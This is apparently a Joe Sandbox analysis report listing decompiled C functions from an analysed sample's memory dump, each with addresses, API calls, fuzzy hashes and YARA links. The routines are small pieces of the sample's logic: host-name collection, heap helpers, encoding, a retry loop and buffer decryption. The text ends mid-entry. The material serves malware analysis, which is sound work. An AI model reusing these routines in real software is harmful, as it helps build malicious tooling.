                            • Opcode Fuzzy Hash: a9464513263b9f74a25acf4b36a43866c0c91aba30824201772244a351de98f8
                            • Instruction Fuzzy Hash: 70014F36901109BFCB419FA8DC04DAF7BBAEF88710B014067F906E7260E7709915DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D3DE0 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E006D3DE0(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E006D7A71(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E006D789E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                            0x006d3de5
                            0x006d3df0
                            0x006d3df2
                            0x006d3df8
                            0x006d3dfa
                            0x006d3dff
                            0x006d3e08
                            0x006d3e0c
                            0x006d3e15
                            0x006d3e19
                            0x006d3e28
                            0x006d3e1b
                            0x006d3e1c
                            0x006d3e21
                            0x006d3e21
                            0x006d3e19
                            0x006d3e0c
                            0x006d3e31

                            APIs
                            • GetComputerNameExA.KERNELBASE(00000003,00000000,006D3730,00000000,00000000,?,7491C740,006D3730), ref: 006D3DF8
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetComputerNameExA.KERNELBASE(00000003,00000000,006D3730,006D3731,?,7491C740,006D3730), ref: 006D3E15
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ComputerHeapName$AllocateFree
                            • String ID:
                            • API String ID: 187446995-0
                            • Opcode ID: 2568842082b43460900db0bb8f33bef2f6ef6425a8dd21394d8ba044d73f4e18
                            • Instruction ID: e4f71ed6a05cfe5d2824188f3d0b4b8a1c2e96baf3829c8b305b02fc3c3704f7
                            • Opcode Fuzzy Hash: 2568842082b43460900db0bb8f33bef2f6ef6425a8dd21394d8ba044d73f4e18
                            • Instruction Fuzzy Hash: 02F0542AE00116BAEB21D6A9DD05FAF77EEDBC5750F25006BA900D7380EA70DF019671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D72C0 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D72C0(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x6da2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x6da1c8 = GetTickCount();
				_t5 = E006D2D54(_a4);
				if(_t5 == 0) {
					_t5 = E006D2CEC(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E006D534A(_t9) != 0) {
							 *0x6da300 = 1; // executed
						}
						_t7 = E006D10AD(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                            0x006d72c0
                            0x006d72c9
                            0x006d72cf
                            0x006d72d6
                            0x006d72da
                            0x00000000
                            0x006d72da
                            0x006d72e7
                            0x006d72ec
                            0x006d72f3
                            0x006d72f9
                            0x006d7300
                            0x006d7309
                            0x006d730b
                            0x006d730b
                            0x006d7315
                            0x00000000
                            0x006d7315
                            0x006d7300
                            0x006d731a

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00400000,00000000,006D3930,?), ref: 006D72C9
                            • GetTickCount.KERNEL32 ref: 006D72DD
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CountCreateHeapTick
                            • String ID:
                            • API String ID: 2177101570-0
                            • Opcode ID: 7d1db19f4d928e0898461d60eacee308bf38ebc973a3d9d3fcc6575824da5ac1
                            • Instruction ID: 6fe216fad6e4a51da03393459a5e82023711b962921029ca6a1aaa13715ba10c
                            • Opcode Fuzzy Hash: 7d1db19f4d928e0898461d60eacee308bf38ebc973a3d9d3fcc6575824da5ac1
                            • Instruction Fuzzy Hash: BEF06D30D0C342AADB602FB1AC06B1937976F24745F11582BFC01D43A2FBB1C800A62B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D1FB6 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E006D1FB6(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x6da2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                            0x006d1fbb
                            0x006d1fc0
                            0x006d1fce
                            0x006d1fd4
                            0x006d1fd8
                            0x006d2049
                            0x006d1fda
                            0x006d1fde
                            0x006d1fe1
                            0x006d1fe4
                            0x006d1feb
                            0x006d1fec
                            0x006d1fed
                            0x006d1fef
                            0x006d1ff4
                            0x006d1ffb
                            0x006d2001
                            0x006d2002
                            0x006d2002
                            0x006d2009
                            0x006d200a
                            0x006d200b
                            0x006d200f
                            0x006d201b
                            0x006d2021
                            0x006d2022
                            0x006d2022
                            0x006d2024
                            0x006d202a
                            0x006d202c
                            0x006d2031
                            0x006d2032
                            0x006d2032
                            0x006d2038
                            0x006d2041
                            0x006d2043
                            0x006d2046
                            0x006d2055

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 006D1FCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 7835fe3d7aa98434f771233ebccacaf737ee15b70200524375abcfd4e5a38785
                            • Instruction ID: 66277946c06d350b62f8de881166d7952d10bedf864d55fd62e31669fd5ce8b2
                            • Opcode Fuzzy Hash: 7835fe3d7aa98434f771233ebccacaf737ee15b70200524375abcfd4e5a38785
                            • Instruction Fuzzy Hash: 1E11E971645345AFEB168F2AD851BE97BA6DF67318F14508FE4408F392C277890BC760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5D05 Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D5D05(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x6da368; // 0x14a9668
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E006D7571( &_v68) == 0) {
						goto L16;
					}
					_t30 = E006D2C73(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E006D4F4B(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E006DA000 = E006DA000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E006D70E7( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x6da30c, 0) == 0x102);
				return _t30;
			}

















                            0x006d5d05
                            0x006d5d0b
                            0x006d5d12
                            0x006d5d1a
                            0x006d5d20
                            0x006d5d23
                            0x006d5d25
                            0x006d5d25
                            0x006d5d2d
                            0x006d5d2d
                            0x006d5d37
                            0x00000000
                            0x00000000
                            0x006d5d46
                            0x006d5d4a
                            0x006d5d4e
                            0x006d5d53
                            0x006d5d57
                            0x006d5d93
                            0x006d5d95
                            0x006d5d95
                            0x006d5d59
                            0x006d5d60
                            0x006d5d8a
                            0x006d5d62
                            0x006d5d62
                            0x006d5d67
                            0x006d5d83
                            0x006d5d69
                            0x006d5d69
                            0x006d5d6e
                            0x006d5d73
                            0x006d5d76
                            0x006d5d78
                            0x006d5d7d
                            0x006d5d7f
                            0x006d5d7f
                            0x006d5d7d
                            0x006d5d6e
                            0x006d5d67
                            0x006d5d60
                            0x006d5d57
                            0x006d5da2
                            0x006d5da7
                            0x006d5da7
                            0x006d5dcb

                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,74CF81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006D5DB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ObjectSingleWait
                            • String ID:
                            • API String ID: 24740636-0
                            • Opcode ID: e2c1413b1a0b14c287a5664b34fb504008110c682fb405e35af80f4e2752c817
                            • Instruction ID: 6af75ed4678e1ef0c142f6f8161bbf17c95d29a7af965b667151f8440c9524ef
                            • Opcode Fuzzy Hash: e2c1413b1a0b14c287a5664b34fb504008110c682fb405e35af80f4e2752c817
                            • Instruction Fuzzy Hash: B9218E31F01A069BDB129F59D858BAE37A7AF94350F14442BE4039B790DB70DC428B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5BB5 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                            Download Yara Rule
                            C-Code - Quality: 34%
                            			E006D5BB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x6da348; // 0xdcd5a8
				_t4 = _t15 + 0x6db3a0; // 0x14a8948
				_t20 = _t4;
				_t6 = _t15 + 0x6db124; // 0x650047
				_t17 = E006D4BD5(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E006D1D63(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                            0x006d5bbf
                            0x006d5bc6
                            0x006d5bc7
                            0x006d5bc8
                            0x006d5bc9
                            0x006d5bcf
                            0x006d5bd4
                            0x006d5bd4
                            0x006d5bde
                            0x006d5bf0
                            0x006d5bf7
                            0x006d5c25
                            0x006d5bf9
                            0x006d5bfb
                            0x006d5c00
                            0x006d5c22
                            0x006d5c02
                            0x006d5c05
                            0x006d5c0c
                            0x006d5c11
                            0x006d5c13
                            0x006d5c13
                            0x006d5c18
                            0x006d5c18
                            0x006d5c00
                            0x006d5c2c

                            APIs
                              • Part of subcall function 006D4BD5: SysFreeString.OLEAUT32(?), ref: 006D4CB4
                              • Part of subcall function 006D1D63: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,006D6189,004F0053,00000000,?), ref: 006D1D6C
                              • Part of subcall function 006D1D63: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,006D6189,004F0053,00000000,?), ref: 006D1D96
                              • Part of subcall function 006D1D63: memset.NTDLL ref: 006D1DAA
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5C18
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeString$lstrlenmemcpymemset
                            • String ID:
                            • API String ID: 397948122-0
                            • Opcode ID: 41c7d88525b14727aa9152028ffa4d68febb9e5b6ab9c17acbb5b99ea7bc0c1b
                            • Instruction ID: dfa0ebbcd2148faeaa4e197060fa89d01f3a633c0b2b6b6b997ff70518931896
                            • Opcode Fuzzy Hash: 41c7d88525b14727aa9152028ffa4d68febb9e5b6ab9c17acbb5b99ea7bc0c1b
                            • Instruction Fuzzy Hash: D2017131910619BFDB619FA8CC05EAABBBAFB08750F01546AF906E7260E7709911CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5DD4 Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E006D5DD4(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E006D1FB6(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x6da348; // 0xdcd5a8
						_t9 = _t17 + 0x6dba32; // 0x444f4340
						_t20 = E006D69D2( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x6da2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                            0x006d5dd7
                            0x006d5ddd
                            0x006d5e34
                            0x006d5de3
                            0x006d5dee
                            0x006d5df3
                            0x006d5df7
                            0x006d5e04
                            0x006d5e0c
                            0x006d5e18
                            0x006d5e20
                            0x006d5e2a
                            0x006d5e2a
                            0x006d5df7
                            0x006d5e39

                            APIs
                              • Part of subcall function 006D1FB6: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 006D1FCE
                              • Part of subcall function 006D69D2: lstrlen.KERNEL32(74D0F710,?,00000000,?,74D0F710), ref: 006D6A06
                              • Part of subcall function 006D69D2: StrStrA.SHLWAPI(00000000,?), ref: 006D6A13
                              • Part of subcall function 006D69D2: RtlAllocateHeap.NTDLL(00000000,?), ref: 006D6A32
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,006D6495), ref: 006D5E2A
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Heap$Allocate$Freelstrlen
                            • String ID:
                            • API String ID: 2220322926-0
                            • Opcode ID: 697707fb3881c72abbb8f58a07b854f2018617a1a6a1908b3d3989da30f37b91
                            • Instruction ID: e60bf546ee90243e7b7fcfde3f8a48bf4b73d7f702c431e0e21d696a618bb28e
                            • Opcode Fuzzy Hash: 697707fb3881c72abbb8f58a07b854f2018617a1a6a1908b3d3989da30f37b91
                            • Instruction Fuzzy Hash: 7E016936500609FFDB11DF44DC00EAA7BAAEB84350F14402BFA4686770EB71EE45DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401329 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00401329(void* __eax, intOrPtr _a4) {

				 *0x403190 =  *0x403190 & 0x00000000;
				_push(0);
				_push(0x40318c);
				_push(1);
				_push(_a4);
				 *0x403188 = 0xc; // executed
				L00401814(); // executed
				return __eax;
			}



                            0x00401329
                            0x00401330
                            0x00401332
                            0x00401337
                            0x00401339
                            0x0040133d
                            0x00401347
                            0x0040134c

                            APIs
                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401223,00000001,0040318C,00000000), ref: 00401347
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: DescriptorSecurity$ConvertString
                            • String ID:
                            • API String ID: 3907675253-0
                            • Opcode ID: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
                            • Instruction ID: 0a6ed26458322d25cf41c4398ef33c21c70633b53ff5094838ea71f747521604
                            • Opcode Fuzzy Hash: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
                            • Instruction Fuzzy Hash: 6FC04C75150300B6E610AF009D46F457E597758B0AF60452EB644391E1C3F95254952D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D7A71 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D7A71(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x6da2d8, 0, _a4); // executed
				return _t2;
			}




                            0x006d7a7d
                            0x006d7a83

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: b4286ad689b88173ec9b504bd5c2f88a1e9c5d477467d16ba3a2d774bdd7ede1
                            • Instruction ID: 7ef4f12f29f139dd4b2ca3c0bf4cf01d7e0a468967b71ee291d4cb28c47decba
                            • Opcode Fuzzy Hash: b4286ad689b88173ec9b504bd5c2f88a1e9c5d477467d16ba3a2d774bdd7ede1
                            • Instruction Fuzzy Hash: ABB01231805200ABCF014F41ED08F057B23BB90700F045016B2084007082330460FB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D789E Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D789E(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x6da2d8, 0, _a4); // executed
				return _t2;
			}




                            0x006d78aa
                            0x006d78b0

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: e623d4fec31179a6e1130e715d277ed8341ac305ae4327c2eb9a2757db44d4fa
                            • Instruction ID: 92c5a42fb097f584031974594afd14f48736f79ba165bbac8a1f45b74abf6747
                            • Opcode Fuzzy Hash: e623d4fec31179a6e1130e715d277ed8341ac305ae4327c2eb9a2757db44d4fa
                            • Instruction Fuzzy Hash: 57B01271905200ABCF114B41EE04F057B23AB90700F045016B3045007482320420FB26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D1DBC Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D1DBC(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E006D6356(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E006D7A71(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E006D789E(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E006D70A6(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E006D47E5(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                            0x006d1dc7
                            0x006d1dca
                            0x006d1dd1
                            0x006d1dd4
                            0x006d1dd7
                            0x006d1ddc
                            0x006d1ed8
                            0x006d1edc
                            0x006d1dee
                            0x006d1dfa
                            0x006d1e01
                            0x006d1e08
                            0x00000000
                            0x00000000
                            0x006d1e0e
                            0x006d1e16
                            0x00000000
                            0x00000000
                            0x006d1e1c
                            0x006d1e25
                            0x006d1e29
                            0x00000000
                            0x00000000
                            0x006d1e2b
                            0x006d1e32
                            0x006d1e37
                            0x006d1e3a
                            0x006d1e3c
                            0x006d1ebd
                            0x006d1ec4
                            0x006d1ec6
                            0x00000000
                            0x00000000
                            0x006d1ec8
                            0x006d1ecc
                            0x006d1ed1
                            0x006d1ed1
                            0x00000000
                            0x006d1ecc
                            0x006d1e43
                            0x006d1e4b
                            0x006d1e4b
                            0x006d1e54
                            0x006d1e62
                            0x006d1eb9
                            0x006d1eb9
                            0x00000000
                            0x006d1e85
                            0x006d1e88
                            0x00000000
                            0x006d1e88
                            0x006d1e62
                            0x006d1e97
                            0x006d1ea5
                            0x006d1eaa
                            0x006d1eac
                            0x006d1ec1
                            0x00000000
                            0x006d1ec1
                            0x006d1eae
                            0x006d1eb4
                            0x006d1eb7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d1eb7

                            APIs
                            • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 006D1E43
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 5e406ea88fbe36327240fc74ccace8f3231dda3a7aab06252878a88bad6d2202
